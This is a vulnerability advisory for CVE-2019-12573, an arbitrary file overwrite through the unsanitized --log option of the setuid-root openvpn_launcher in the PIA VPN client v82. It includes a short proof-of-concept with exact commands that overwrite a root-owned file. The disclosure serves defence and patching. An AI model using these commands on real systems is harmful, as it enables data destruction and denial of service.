Allele Security Alert
ASA-2019-00379
Identifier(s)
ASA-2019-00379, CVE-2019-12573
Title
Arbitrary File Overwrite
Vendor(s)
London Trust Media Private
Product(s)
Private Internet Access (PIA) VPN Client for Linux and macOS
Affected version(s)
Private Internet Access (PIA) VPN Client for Linux and macOS version v82
Fixed version(s)
Private Internet Access (PIA) VPN Client for Linux and macOS v1.2.1 or later
Proof of concept
Unknown
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to overwrite arbitrary files.
Technical details
The PIA Linux and macOS openvpn_launcher binary is setuid root. This binary supports the –log option which accepts a path as an argument. The –log parameter is not sanitized which allows a local unprivileged to overwrite arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
Steps to reproduce
Step 1 – Create a root owned test file. For this PoC /etc/test.txt is used.
# As root echo "this is a test" > /etc/test.txt chmod 600 /etc/test.txt
Step 2 – Overwrite the file using the –log option using a non privileged user.
# macOS /Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt # Linux /opt/pia/openvpn_launcher.64 --log /etc/test.txt
Step 3 – Verify the file contents have been overwritten
# As root cat /etc/test.txt
Credits
Rich Mirch
Reference(s)
PIA Linux, macOS Arbitrary File Overwrite
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12573.txt
CVE-2019-12573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12573
CVE-2019-12573
https://nvd.nist.gov/vuln/detail/CVE-2019-12573
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: June 25, 2019